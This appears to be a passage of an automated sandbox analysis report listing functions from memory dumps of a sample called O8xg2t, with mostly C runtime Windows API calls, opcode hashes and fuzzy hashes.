                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: StringType$ByteCharMultiWide$ErrorLast
                                  • String ID:
                                  • API String ID: 319667368-0
                                  • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                  • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                  • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                  • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                  Function 000000014000ADE0 Relevance: 9.2, APIs: 6, Instructions: 167COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                  • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                    • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                  • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                  • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                  • String ID:
                                  • API String ID: 1390108997-0
                                  • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                  • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                  • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                  • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                  Function 00007FFBC1BA4CD4 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 319COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                  • String ID: csm$csm$csm
                                  • API String ID: 3523768491-393685449
                                  • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                  • Instruction ID: dc06fb5fa9b71da989c45672d6d37ec08183d3f4ccbb6aac84278cfdd9f0e4e0
                                  • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                  • Instruction Fuzzy Hash: BCE1B1B6B097828AE7209F39D4803BE77A0FB45748F146135DE8D67A96CF38E581CB40
                                  Function 00007FFBC1BA95BC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(?,?,?,00007FFBC1BA8BC9,?,?,?,?,00007FFBC1BA8C14), ref: 00007FFBC1BA95CB
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC1BA8BC9,?,?,?,?,00007FFBC1BA8C14), ref: 00007FFBC1BA9601
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC1BA8BC9,?,?,?,?,00007FFBC1BA8C14), ref: 00007FFBC1BA962E
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC1BA8BC9,?,?,?,?,00007FFBC1BA8C14), ref: 00007FFBC1BA963F
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC1BA8BC9,?,?,?,?,00007FFBC1BA8C14), ref: 00007FFBC1BA9650
                                  • SetLastError.KERNEL32(?,?,?,00007FFBC1BA8BC9,?,?,?,?,00007FFBC1BA8C14), ref: 00007FFBC1BA966B
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Value$ErrorLast
                                  • String ID:
                                  • API String ID: 2506987500-0
                                  • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                  • Instruction ID: 21491742607ee10a4d92690e5fe13e2d8aef9a86c079129b8e0a7a530d4233d5
                                  • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                  • Instruction Fuzzy Hash: AD115EACF0E64245FB58AF36D66113B23529F487B0F44A735E93E66AC6DE2CB441DE00
                                  Function 0000000140013850 Relevance: 9.0, APIs: 6, Instructions: 18synchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                  • String ID:
                                  • API String ID: 3326452711-0
                                  • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                  • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                  • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                  • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                  Function 0000000140003790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeaveTimerWaitable
                                  • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                  • API String ID: 2984211723-1229430080
                                  • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                  • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                  • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                  • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                  Function 00007FFBC1BA7F28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                  • Instruction ID: b8405dae1435797d0b5e0b4166712639ce0708423d601e40ca541aabb3c088e8
                                  • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                  • Instruction Fuzzy Hash: DCF0C2A9B19A0281EB108F34E44433B6320AF88760F846335CA6D56AF4CF3DE149CB00
                                  Function 0000000140008510 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                  • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                  • ExitProcess.KERNEL32 ref: 0000000140008545
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AddressExitHandleModuleProcProcess
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 75539706-1276376045
                                  • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                  • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                  • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                  • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                  Function 00007FFBC1BA40D4 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AdjustPointer
                                  • String ID:
                                  • API String ID: 1740715915-0
                                  • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                  • Instruction ID: 2d58787c1e438a1a42ba65b87722c3ea6b3dad21c9fec87d242cc92b6ed0a40c
                                  • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                  • Instruction Fuzzy Hash: ACB1A0A9B0B74281EB65DF35D58023EA790EF54B84F0DA835DE4D27B95DE3CE4428B00
                                  Function 0000000140009F50 Relevance: 7.7, APIs: 5, Instructions: 208COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: FileInfoSleepStartupType
                                  • String ID:
                                  • API String ID: 1527402494-0
                                  • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                  • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                  • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                  • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                  Function 0000000140009E30 Relevance: 7.6, APIs: 5, Instructions: 74COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CommandLine$ByteCharErrorLastMultiWide
                                  • String ID:
                                  • API String ID: 3078728599-0
                                  • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                  • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                  • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                  • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                  Function 000000014000FD50 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                  • String ID:
                                  • API String ID: 1850339568-0
                                  • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                  • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                  • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                  • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                  Function 00007FFBC1BAFB54 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: _set_statfp
                                  • String ID:
                                  • API String ID: 1156100317-0
                                  • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                  • Instruction ID: 3e4d024bc979473759fe9c4a1ca97b449436c695de90e4f408d8494207eeacd0
                                  • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                  • Instruction Fuzzy Hash: 501108FAF09A0701F3541934E1253BF13206F9C3F0F9462B8E56FA66DA8E2CAC404920
                                  Function 00007FFBC1BA9684 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • FlsGetValue.KERNEL32(?,?,?,00007FFBC1BA766F,?,?,00000000,00007FFBC1BA790A,?,?,?,?,?,00007FFBC1BA7896), ref: 00007FFBC1BA96A3
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC1BA766F,?,?,00000000,00007FFBC1BA790A,?,?,?,?,?,00007FFBC1BA7896), ref: 00007FFBC1BA96C2
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC1BA766F,?,?,00000000,00007FFBC1BA790A,?,?,?,?,?,00007FFBC1BA7896), ref: 00007FFBC1BA96EA
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC1BA766F,?,?,00000000,00007FFBC1BA790A,?,?,?,?,?,00007FFBC1BA7896), ref: 00007FFBC1BA96FB
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC1BA766F,?,?,00000000,00007FFBC1BA790A,?,?,?,?,?,00007FFBC1BA7896), ref: 00007FFBC1BA970C
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                  • Instruction ID: db85ac5fc44e1bbb4cd957f3d16b5cc295d8927a424341db9fb2829643ff1d96
                                  • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                  • Instruction Fuzzy Hash: B8114FA8F0E24245FB58AF36E66127B23415F447F0F546335E83D666D6EE2CA4419E00
                                  Function 00007FFBC1BA9518 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                  • Instruction ID: 3653edb162c491dca73d7d181adf929168c43c37faaca29f18faf3ac8d838862
                                  • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                  • Instruction Fuzzy Hash: 1E11E8D8F0E2074AFB68AF36D56227B13814F44375F546734D97E6A6D2EE2CB4429E00
                                  Function 000000014000A370 Relevance: 7.5, APIs: 5, Instructions: 41timethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                  • String ID:
                                  • API String ID: 1445889803-0
                                  • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                  • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                                  • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                  • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                                  Function 00007FFBC1BA5448 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CallEncodePointerTranslator
                                  • String ID: MOC$RCC
                                  • API String ID: 3544855599-2084237596
                                  • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                  • Instruction ID: 25dbf5edc7b93ad68bbfc18731a3c428cab1ea5acfffb0b706ffa6cf6a7fafa4
                                  • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                  • Instruction Fuzzy Hash: 1C918EB7B097858AE7108F78E5402AE7BA0FB44788F14512AEA8D67B55DF38D195CB00
                                  Function 00007FFBC1BA3A38 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 2395640692-1018135373
                                  • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                  • Instruction ID: fa01c1e7ecf82f8e7eb828a2fc38ebe7955345db14304b9fb93133d8f67ba6a3
                                  • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
